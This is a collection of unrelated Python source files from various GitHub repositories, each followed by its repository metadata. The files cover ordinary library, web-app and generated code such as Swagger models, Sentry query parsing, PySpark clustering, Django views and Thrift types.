OpenAPI spec version: v6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class StoredCardInfo(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'last_four': 'str'
}
attribute_map = {
'last_four': 'LastFour'
}
def __init__(self, last_four=None): # noqa: E501
"""StoredCardInfo - a model defined in Swagger""" # noqa: E501
self._last_four = None
self.discriminator = None
if last_four is not None:
self.last_four = last_four
@property
def last_four(self):
"""Gets the last_four of this StoredCardInfo. # noqa: E501
:return: The last_four of this StoredCardInfo. # noqa: E501
:rtype: str
"""
return self._last_four
@last_four.setter
def last_four(self, last_four):
"""Sets the last_four of this StoredCardInfo.
:param last_four: The last_four of this StoredCardInfo. # noqa: E501
:type: str
"""
self._last_four = last_four
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(StoredCardInfo, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, StoredCardInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
{
"content_hash": "4ade070d0ba30003a145c0484a2a9cb6",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 119,
"avg_line_length": 27.646017699115045,
"alnum_prop": 0.5425736235595391,
"repo_name": "mindbody/API-Examples",
"id": "312ede49252f57eaf3a549554118995af2e0a4f5",
"size": "3141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SDKs/Python/swagger_client/models/stored_card_info.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "PHP",
"bytes": "3610259"
},
{
"name": "Python",
"bytes": "2338642"
},
{
"name": "Ruby",
"bytes": "2284441"
},
{
"name": "Shell",
"bytes": "5058"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from sentry.constants import STATUS_CHOICES
from sentry.models import EventUser, User
from sentry.utils.auth import find_users
def get_user_tag(project, key, value):
if key == 'id':
lookup = 'ident'
elif key == 'ip':
lookup = 'ip_address'
else:
lookup = key
# TODO(dcramer): do something with case of multiple matches
try:
euser = EventUser.objects.filter(
project=project,
**{lookup: value}
)[0]
except IndexError:
return '{}:{}'.format(key, value)
return euser.tag_value
def parse_query(project, query, user):
# TODO(dcramer): handle query being wrapped in quotes
tokens = query.split(' ')
results = {'tags': {}, 'query': []}
tokens_iter = iter(tokens)
for token in tokens_iter:
# ignore empty tokens
if not token:
continue
if ':' not in token:
results['query'].append(token)
continue
key, value = token.split(':', 1)
if not value:
results['query'].append(token)
continue
if value[0] == '"':
nvalue = value
while nvalue[-1] != '"':
try:
nvalue = tokens_iter.next()
except StopIteration:
break
value = '%s %s' % (value, nvalue)
if value.endswith('"'):
value = value[1:-1]
else:
value = value[1:]
if key == 'is':
try:
results['status'] = STATUS_CHOICES[value]
except KeyError:
pass
elif key == 'assigned':
if value == 'me':
results['assigned_to'] = user
else:
try:
results['assigned_to'] = find_users(value)[0]
except IndexError:
# XXX(dcramer): hacky way to avoid showing any results when
# an invalid user is entered
results['assigned_to'] = User(id=0)
elif key == 'first-release':
results['first_release'] = value
elif key == 'release':
results['tags']['sentry:release'] = value
elif key == 'user':
if ':' in value:
comp, value = value.split(':', 1)
else:
comp = 'id'
results['tags']['sentry:user'] = get_user_tag(
project, comp, value)
elif key.startswith('user.'):
results['tags']['sentry:user'] = get_user_tag(
project, key.split('.', 1)[1], value)
else:
results['tags'][key] = value
results['query'] = ' '.join(results['query'])
return results
|
{
"content_hash": "60d6346dbe398c53aae0c94bba276c09",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 79,
"avg_line_length": 29.36082474226804,
"alnum_prop": 0.488061797752809,
"repo_name": "Natim/sentry",
"id": "488af414c1460370ec4f28306c8ce7d6780385ac",
"size": "2848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/search/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "160813"
},
{
"name": "HTML",
"bytes": "193981"
},
{
"name": "JavaScript",
"bytes": "417570"
},
{
"name": "Makefile",
"bytes": "2832"
},
{
"name": "Python",
"bytes": "6877708"
}
],
"symlink_target": ""
}
|
import mymodule
mymodule.sayhi()
print('Version:', mymodule.__version__)
|
{
"content_hash": "6132cbed532fb2794caaaafd9f4c20f9",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 39,
"avg_line_length": 24.333333333333332,
"alnum_prop": 0.7397260273972602,
"repo_name": "louistin/thinkstation",
"id": "e01910fdfd52f18ee0b88f03c8fae323e68bbf19",
"size": "93",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "a_byte_of_python/unit_9_module/mymodule_demo.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2640"
},
{
"name": "C++",
"bytes": "21715"
},
{
"name": "GCC Machine Description",
"bytes": "559"
},
{
"name": "Go",
"bytes": "3714"
},
{
"name": "Python",
"bytes": "26890"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
from docs import getVersion
# Variables ===================================================================
changelog = open('CHANGELOG.rst').read()
long_description = "\n\n".join([
open('README.rst').read(),
changelog
])
# Actual setup definition =====================================================
setup(
name='edeposit.amqp.aleph_link_export',
version=getVersion(changelog),
description="Subsystem for updating Edeposit's links in Aleph.",
long_description=long_description,
url='https://github.com/edeposit/edeposit.amqp.aleph_link_export/',
author='Edeposit team',
author_email='edeposit@email.cz',
classifiers=[
"Development Status :: 3 - Alpha",
'Intended Audience :: Developers',
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: MIT License",
],
license='MIT',
packages=find_packages('src'),
package_dir={'': 'src'},
namespace_packages=['edeposit', 'edeposit.amqp'],
zip_safe=False,
include_package_data=True,
install_requires=open("requirements.txt").read().splitlines(),
test_suite='py.test',
tests_require=["pytest"],
extras_require={
"test": [
"pytest",
],
"docs": [
"sphinx",
"sphinxcontrib-napoleon",
]
},
)
|
{
"content_hash": "82a3ec6c36c72d27866f9c350e8c6d35",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 79,
"avg_line_length": 26.555555555555557,
"alnum_prop": 0.5578800557880056,
"repo_name": "edeposit/edeposit.amqp.aleph_link_export",
"id": "acca6549f19a77363b62b7d8867aa389c6c2e2cb",
"size": "1599",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34956"
},
{
"name": "Shell",
"bytes": "167"
}
],
"symlink_target": ""
}
|
import price
import workcenter_load
import order
import bom_structure
import mrp_report
import mrp_production_order
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "4afd08f735ac5fe874ce9c4d05efef89",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 65,
"avg_line_length": 20.444444444444443,
"alnum_prop": 0.8315217391304348,
"repo_name": "chjw8016/GreenOdoo7-haibao",
"id": "471e3440af3c7891cb8d7d440f86c04ddeab1f65",
"size": "1163",
"binary": false,
"copies": "67",
"ref": "refs/heads/master",
"path": "openerp/addons/mrp/report/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "90846"
},
{
"name": "CSS",
"bytes": "384369"
},
{
"name": "JavaScript",
"bytes": "1730589"
},
{
"name": "PHP",
"bytes": "14033"
},
{
"name": "Python",
"bytes": "9394626"
},
{
"name": "Shell",
"bytes": "5172"
},
{
"name": "XSLT",
"bytes": "156761"
}
],
"symlink_target": ""
}
|
"""Network package exceptions."""
__version__ = '$Revision: #2 $'
class Error(Exception):
"""Base exception for all network package exceptions."""
def __str__(self):
return self.__repr__()
class IPValidationError(Error):
"""IP address is invalid.
:IVariables:
- `address`: The address that is invalid. In some circumstances this
may be a string and in others it may be an integer.
"""
def __init__(self, address):
Exception.__init__(self)
self.address = address
def __repr__(self):
return '<IPValidationError %s>' % (self.address,)
class MaskValidationError(Error):
"""Mask is invalid.
:IVariables:
- `mask`: The mask that is invalid. In some circumstances this
may be a string and in others it may be an integer.
"""
def __init__(self, mask):
Exception.__init__(self)
self.mask = mask
def __repr__(self):
return '<MaskValidationError %s>' % (self.mask,)
|
{
"content_hash": "626cd8050ff8a802fb9fe3320259a10a",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 24.071428571428573,
"alnum_prop": 0.592482690405539,
"repo_name": "ironport/aplib",
"id": "60301f497d3369df4c806b7518635ef25e2cc323",
"size": "2202",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aplib/net/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5341"
},
{
"name": "Python",
"bytes": "292622"
}
],
"symlink_target": ""
}
|
from numpy import array
from pyspark import RDD
from pyspark import SparkContext
from pyspark.mllib.common import callMLlibFunc, callJavaFunc
from pyspark.mllib.linalg import DenseVector, SparseVector, _convert_to_vector
from pyspark.mllib.stat.distribution import MultivariateGaussian
__all__ = ['KMeansModel', 'KMeans', 'GaussianMixtureModel', 'GaussianMixture']
class KMeansModel(object):
"""A clustering model derived from the k-means method.
>>> data = array([0.0,0.0, 1.0,1.0, 9.0,8.0, 8.0,9.0]).reshape(4, 2)
>>> model = KMeans.train(
... sc.parallelize(data), 2, maxIterations=10, runs=30, initializationMode="random")
>>> model.predict(array([0.0, 0.0])) == model.predict(array([1.0, 1.0]))
True
>>> model.predict(array([8.0, 9.0])) == model.predict(array([9.0, 8.0]))
True
>>> model = KMeans.train(sc.parallelize(data), 2)
>>> sparse_data = [
... SparseVector(3, {1: 1.0}),
... SparseVector(3, {1: 1.1}),
... SparseVector(3, {2: 1.0}),
... SparseVector(3, {2: 1.1})
... ]
>>> model = KMeans.train(sc.parallelize(sparse_data), 2, initializationMode="k-means||")
>>> model.predict(array([0., 1., 0.])) == model.predict(array([0, 1.1, 0.]))
True
>>> model.predict(array([0., 0., 1.])) == model.predict(array([0, 0, 1.1]))
True
>>> model.predict(sparse_data[0]) == model.predict(sparse_data[1])
True
>>> model.predict(sparse_data[2]) == model.predict(sparse_data[3])
True
>>> type(model.clusterCenters)
<type 'list'>
"""
def __init__(self, centers):
self.centers = centers
@property
def clusterCenters(self):
"""Get the cluster centers, represented as a list of NumPy arrays."""
return self.centers
def predict(self, x):
"""Find the cluster to which x belongs in this model."""
best = 0
best_distance = float("inf")
x = _convert_to_vector(x)
for i in xrange(len(self.centers)):
distance = x.squared_distance(self.centers[i])
if distance < best_distance:
best = i
best_distance = distance
return best
class KMeans(object):
@classmethod
def train(cls, rdd, k, maxIterations=100, runs=1, initializationMode="k-means||", seed=None):
"""Train a k-means clustering model."""
model = callMLlibFunc("trainKMeansModel", rdd.map(_convert_to_vector), k, maxIterations,
runs, initializationMode, seed)
centers = callJavaFunc(rdd.context, model.clusterCenters)
return KMeansModel([c.toArray() for c in centers])
class GaussianMixtureModel(object):
"""A clustering model derived from the Gaussian Mixture Model method.
>>> clusterdata_1 = sc.parallelize(array([-0.1,-0.05,-0.01,-0.1,
... 0.9,0.8,0.75,0.935,
... -0.83,-0.68,-0.91,-0.76 ]).reshape(6, 2))
>>> model = GaussianMixture.train(clusterdata_1, 3, convergenceTol=0.0001,
... maxIterations=50, seed=10)
>>> labels = model.predict(clusterdata_1).collect()
>>> labels[0]==labels[1]
False
>>> labels[1]==labels[2]
True
>>> labels[4]==labels[5]
True
>>> clusterdata_2 = sc.parallelize(array([-5.1971, -2.5359, -3.8220,
... -5.2211, -5.0602, 4.7118,
... 6.8989, 3.4592, 4.6322,
... 5.7048, 4.6567, 5.5026,
... 4.5605, 5.2043, 6.2734]).reshape(5, 3))
>>> model = GaussianMixture.train(clusterdata_2, 2, convergenceTol=0.0001,
... maxIterations=150, seed=10)
>>> labels = model.predict(clusterdata_2).collect()
>>> labels[0]==labels[1]==labels[2]
True
>>> labels[3]==labels[4]
True
"""
def __init__(self, weights, gaussians):
self.weights = weights
self.gaussians = gaussians
self.k = len(self.weights)
def predict(self, x):
"""
Find the cluster to which the points in 'x' has maximum membership
in this model.
:param x: RDD of data points.
:return: cluster_labels. RDD of cluster labels.
"""
if isinstance(x, RDD):
cluster_labels = self.predictSoft(x).map(lambda z: z.index(max(z)))
return cluster_labels
def predictSoft(self, x):
"""
Find the membership of each point in 'x' to all mixture components.
:param x: RDD of data points.
:return: membership_matrix. RDD of array of double values.
"""
if isinstance(x, RDD):
means, sigmas = zip(*[(g.mu, g.sigma) for g in self.gaussians])
membership_matrix = callMLlibFunc("predictSoftGMM", x.map(_convert_to_vector),
self.weights, means, sigmas)
return membership_matrix
class GaussianMixture(object):
"""
Learning algorithm for Gaussian Mixtures using the expectation-maximization algorithm.
:param data: RDD of data points
:param k: Number of components
:param convergenceTol: Threshold value to check the convergence criteria. Defaults to 1e-3
:param maxIterations: Number of iterations. Default to 100
:param seed: Random Seed
"""
@classmethod
def train(cls, rdd, k, convergenceTol=1e-3, maxIterations=100, seed=None):
"""Train a Gaussian Mixture clustering model."""
weight, mu, sigma = callMLlibFunc("trainGaussianMixture",
rdd.map(_convert_to_vector), k,
convergenceTol, maxIterations, seed)
mvg_obj = [MultivariateGaussian(mu[i], sigma[i]) for i in range(k)]
return GaussianMixtureModel(weight, mvg_obj)
def _test():
import doctest
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
{
"content_hash": "2e1358fb032644196d7de46fad84cd9f",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 97,
"avg_line_length": 38.10179640718563,
"alnum_prop": 0.5662423385195663,
"repo_name": "trueyao/spark-lever",
"id": "949db5705abd7ce8aa7f7b958bf7e48c809a19b1",
"size": "7148",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyspark/mllib/clustering.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "35774"
},
{
"name": "CSS",
"bytes": "4512"
},
{
"name": "Java",
"bytes": "787105"
},
{
"name": "JavaScript",
"bytes": "21537"
},
{
"name": "Makefile",
"bytes": "6840"
},
{
"name": "Python",
"bytes": "924210"
},
{
"name": "Roff",
"bytes": "5379"
},
{
"name": "SQLPL",
"bytes": "3603"
},
{
"name": "Scala",
"bytes": "9252639"
},
{
"name": "Shell",
"bytes": "141187"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from .models import Recipient
class RecipientsMixin(object):
"""
A mixin for sending the results to a list of recipients.
"""
def get_recipients(self):
emails = [recipient.user.email for recipient in
Recipient.objects.all().select_related('user') if
recipient.user.email]
return emails if emails else [mail_tuple[1] for
mail_tuple in settings.MANAGERS]
recipient_list = get_recipients
|
{
"content_hash": "dd813ad8c5f4cb794992a6e35cb84321",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 65,
"avg_line_length": 31.5625,
"alnum_prop": 0.6495049504950495,
"repo_name": "bennylope/django-contact-recipients",
"id": "09bac8d0029f825a01e3999f8bbe3277eb7e6014",
"size": "505",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contact_recipients/mixins.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "7867"
}
],
"symlink_target": ""
}
|
"""Logging Module.
This module handles logging to the standard python logging subsystem and to the
console.
"""
from __future__ import absolute_import
import logging
import os
import sys
LOG = logging.getLogger(__name__)
class DebugFormatter(logging.Formatter):
"""Log formatter.
Outputs any 'data' values passed in the 'extra' parameter if provided.
**Example**:
.. code-block:: python
LOG.debug("My message", extra={'data': locals()})
"""
def format(self, record):
"""Print out any 'extra' data provided in logs."""
if hasattr(record, 'data'):
return "%s. DEBUG DATA=%s" % (logging.Formatter.format(self,
record), record.__dict__['data'])
return logging.Formatter.format(self, record)
def init_logging(config, default_config=None):
"""Configure logging based on log config file.
Turn on console logging if no logging files found
:param config: object with configuration namespace (ex. argparse parser)
:keyword default_config: path to a python logging configuration file
"""
if config.get('logconfig') and os.path.isfile(config.get('logconfig')):
logging.config.fileConfig(config['logconfig'],
disable_existing_loggers=False)
elif default_config and os.path.isfile(default_config):
logging.config.fileConfig(default_config,
disable_existing_loggers=False)
else:
init_console_logging(config)
def find_console_handler(logger):
"""Return a stream handler, if it exists."""
for handler in logger.handlers:
if (isinstance(handler, logging.StreamHandler) and
handler.stream == sys.stderr):
return handler
def log_level(config):
"""Get debug settings from configuration.
--debug: turn on additional debug code/inspection (implies
logging.DEBUG)
--verbose: turn up logging output (logging.DEBUG)
--quiet: turn down logging output (logging.WARNING)
default is logging.INFO
:param config: object with configuration namespace (ex. argparse parser)
"""
if config.get('debug') is True:
return logging.DEBUG
elif config.get('verbose') is True:
return logging.DEBUG
elif config.get('quiet') is True:
return logging.WARNING
else:
return logging.INFO
def get_debug_formatter(config):
"""Get debug formatter based on configuration.
:param config: configuration namespace (ex. argparser)
--debug: log line numbers and file data also
--verbose: standard debug
--quiet: turn down logging output (logging.WARNING)
default is logging.INFO
:param config: object with configuration namespace (ex. argparse parser)
"""
if config.get('debug') is True:
return DebugFormatter('%(pathname)s:%(lineno)d: %(levelname)-8s '
'%(message)s')
elif config.get('verbose') is True:
return logging.Formatter(
'%(name)-30s: %(levelname)-8s %(message)s')
elif config.get('quiet') is True:
return logging.Formatter('%(message)s')
else:
return logging.Formatter('%(message)s')
def init_console_logging(config):
"""Enable logging to the console.
:param config: object with configuration namespace (ex. argparse parser)
"""
# define a Handler which writes messages to the sys.stderr
console = find_console_handler(logging.getLogger())
if not console:
console = logging.StreamHandler()
logging_level = log_level(config)
console.setLevel(logging_level)
# set a format which is simpler for console use
formatter = get_debug_formatter(config)
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger().addHandler(console)
logging.getLogger().setLevel(logging_level)
global LOG # pylint: disable=W0603
LOG = logging.getLogger(__name__) # reset
|
{
"content_hash": "36b08933ba59bbdd40254a052a18bcdc",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 79,
"avg_line_length": 31.71875,
"alnum_prop": 0.6517241379310345,
"repo_name": "mgeisler/satori",
"id": "7600290ab7b05c7747a81e3812f65107ebfe7986",
"size": "4625",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "satori/common/logging.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "4788"
},
{
"name": "Python",
"bytes": "220026"
},
{
"name": "Shell",
"bytes": "1111"
}
],
"symlink_target": ""
}
|
import cbox
@cbox.stream()
# we can pass default values and use type annotations for correct types
def nth_item(line, n: int = 0):
"""returns the nth item from each line.
:param n: the number of item position starting from 0
"""
return line.split()[n]
if __name__ == '__main__':
cbox.main(nth_item)
|
{
"content_hash": "3a24fc5896d8b0040fdc78630dff6260",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 71,
"avg_line_length": 21.6,
"alnum_prop": 0.6450617283950617,
"repo_name": "shmuelamar/cbox",
"id": "e3db4a9e781eb37d2c02cfddaa66a7c5677e6783",
"size": "347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/nth-item.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1324"
},
{
"name": "Python",
"bytes": "33379"
}
],
"symlink_target": ""
}
|
from energy_demand import model
|
{
"content_hash": "7b644434a23c0a1c1f0b2aa231e6cbe4",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 31,
"avg_line_length": 31,
"alnum_prop": 0.8709677419354839,
"repo_name": "nismod/energy_demand",
"id": "9009659fc41ac80a80410a340cf63b3a6419c9ab",
"size": "31",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_energy_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1432899"
},
{
"name": "Shell",
"bytes": "2063"
}
],
"symlink_target": ""
}
|
import models
import permissions
def ensure(app):
with app.app_context():
user = models.db.session.query(models.User).get(1)
if not user:
user = models.User(id=1, username='freddie')
models.db.session.add(user)
models.db.session.commit()
post = models.db.session.query(models.Post).get(1)
if not post:
post = models.Post(id=1, title='death on two legs', content='dedicated to...')
models.db.session.add(post)
models.db.session.commit()
try:
permissions.manager.ensure_permission(user, post, 'read')
except:
pass
models.db.session.commit()
|
{
"content_hash": "d43c94f0c18a7a26440c29eee72170cb",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 33.19047619047619,
"alnum_prop": 0.5796269727403156,
"repo_name": "jmcarp/guardrail",
"id": "2972c7f0a7b47331990f2b79582c7fb15933cd1e",
"size": "722",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/flask_sqla/fixtures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55757"
}
],
"symlink_target": ""
}
|
from openerp import api, models
class ReportSession(models.AbstractModel):
_name = "report.openacademy.report_session_view"
@api.multi
def _get_report_values(self, docids, data=None):
# report_obj = self.env["report"]
# report = report_obj._get_report_from_name("openacademy.report_session")
# docargs = {
# "doc_ids": docids,
# "doc_model": report.model,
# "docs": self.env['openacademy.session'].browse(docids),
# "other_variable": 'other value',
# }
# return report_obj.render("openacademy.report_session_view", docargs)
docs = self.env['openacademy.session'].browse(docids)
return {
'doc_ids': docs.ids,
'doc_model': 'openacademy.session',
'docs': docs,
'other_variable': 'other value',
}
|
{
"content_hash": "12e7dde19c7a54dc4f7908b19482772e",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 81,
"avg_line_length": 36.166666666666664,
"alnum_prop": 0.5737327188940092,
"repo_name": "vauxoo-dev/openacademy-project",
"id": "c36712be6bd843616cc08b94c5c59b4c2ac8ce4a",
"size": "991",
"binary": false,
"copies": "1",
"ref": "refs/heads/odoo_ctp_2017",
"path": "openacademy/report.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "15227"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render, render_to_response, redirect
from django.http import HttpResponseRedirect, HttpResponse, HttpRequest
#from django.contrib.auth import authenticate, login as auth_login
from social_auth.models import UserSocialAuth
from play.models import *
from charity.models import *
from shop.models import *
from play.utils import *
from django.utils import simplejson
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate,login as auth_login
from django.contrib.auth.models import User
import json
from django.contrib.auth import logout as django_logout
from shop.forms import *
from django.core.exceptions import *
from datetime import datetime
from datetime import datetime
from shop.utils import *
from play.constants import CITY
def home(request, city_name=CITY):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
player=Player.objects.get(user=user)
pictureUrl(user, player)
organization, shop =getShop(user)
try:
shop=Shop.objects.get(user=user)
createEvent(request, shop)
except ObjectDoesNotExist:
return HttpResponseRedirect('/sorry/')
return render(request, 'shop/home.html', {'user':user,
'player':player,
'shop':shop})
def company(request, city_name=CITY):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
organization, shop=getShop(user)
if not shop:
return HttpResponseRedirect('/sorry/')
if request.method=='POST':
title=request.POST.get('title', '')
location=request.POST.get('location','')
shop.title=title
shop.location=location
shop.save()
return HttpResponseRedirect('/company/')
return render(request, 'shop/company.html', {'user':user,
'shop':shop})
'''
def create_coupon(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
try:
#organization=Organization.objects.get(user=user)
organization, shop=getShop(user)
if request.method=='POST':
form = CouponForm(request.POST)
if form.is_valid():
new_coupon = form.save(commit=False)
new_coupon.shop=shop
new_coupon.save()
return HttpResponseRedirect('/my_coupons/')
else:
form = CouponForm()
return render(request, 'shop/create_coupon.html', {'form':form, 'shop':shop})
except ObjectDoesNotExist:
return HttpResponseRedirect('/sorry/')
'''
def my_coupons(request, city_name=CITY):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
organization, shop=getShop(user)
if not organization:
return HttpResponseRedirect('/sorry/')
list_of_coupons=Coupon.objects.filter(shop=shop)
number=len(list_of_coupons)
id_delete=request.GET.get('delete','')
if request.method == 'POST':
id_delete=request.POST['id_delete']
coupon=Coupon.objects.get(pk=id_delete)
coupon.delete()
return HttpResponseRedirect('/shop/my_coupons/')
return render(request, 'shop/my_coupons.html', {'list_of_coupons':list_of_coupons, 'number':number, 'shop':shop})
def erase(request):
if not request.user.is_authenticated():
return HttpResponseRedirect('/login/')
else:
user=request.user
organization, shop=getShop(user)
if request.method == 'GET':
id_user=request.GET['id_user']
id_coupon=request.GET['id_coupon']
coupon=Coupon.objects.get(id=id_coupon)
player=Player.objects.get(id=id_user)
player.coupon_set.remove(coupon)
CouponHistory.objects.create(
player=player,
shop=shop.title,
title=coupon.title,
#coupon=coupon
)
player.save()
coupon.save()
return HttpResponseRedirect('/my_coupons/')
|
{
"content_hash": "19556c1b4aa729006b9f8d7d52154367",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 121,
"avg_line_length": 35.796875,
"alnum_prop": 0.5986468790920996,
"repo_name": "fraferra/PlayCity",
"id": "3277d9eebc579a96641054d41f3095b27ca9c088",
"size": "4608",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "shop/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "720208"
},
{
"name": "JavaScript",
"bytes": "2228440"
},
{
"name": "Python",
"bytes": "355729"
},
{
"name": "Shell",
"bytes": "169"
}
],
"symlink_target": ""
}
|
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import impala._thrift_gen.Status.ttypes
import impala._thrift_gen.Types.ttypes
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class TExecState(object):
REGISTERED = 0
PLANNING = 1
QUEUED = 2
RUNNING = 3
FINISHED = 4
CANCELLED = 5
FAILED = 6
_VALUES_TO_NAMES = {
0: "REGISTERED",
1: "PLANNING",
2: "QUEUED",
3: "RUNNING",
4: "FINISHED",
5: "CANCELLED",
6: "FAILED",
}
_NAMES_TO_VALUES = {
"REGISTERED": 0,
"PLANNING": 1,
"QUEUED": 2,
"RUNNING": 3,
"FINISHED": 4,
"CANCELLED": 5,
"FAILED": 6,
}
class TExecStats(object):
"""
Attributes:
- latency_ns
- cpu_time_ns
- cardinality
- memory_used
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'latency_ns', None, None, ), # 1
(2, TType.I64, 'cpu_time_ns', None, None, ), # 2
(3, TType.I64, 'cardinality', None, None, ), # 3
(4, TType.I64, 'memory_used', None, None, ), # 4
)
def __init__(self, latency_ns=None, cpu_time_ns=None, cardinality=None, memory_used=None,):
self.latency_ns = latency_ns
self.cpu_time_ns = cpu_time_ns
self.cardinality = cardinality
self.memory_used = memory_used
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.latency_ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.cpu_time_ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.cardinality = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.memory_used = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TExecStats')
if self.latency_ns is not None:
oprot.writeFieldBegin('latency_ns', TType.I64, 1)
oprot.writeI64(self.latency_ns)
oprot.writeFieldEnd()
if self.cpu_time_ns is not None:
oprot.writeFieldBegin('cpu_time_ns', TType.I64, 2)
oprot.writeI64(self.cpu_time_ns)
oprot.writeFieldEnd()
if self.cardinality is not None:
oprot.writeFieldBegin('cardinality', TType.I64, 3)
oprot.writeI64(self.cardinality)
oprot.writeFieldEnd()
if self.memory_used is not None:
oprot.writeFieldBegin('memory_used', TType.I64, 4)
oprot.writeI64(self.memory_used)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
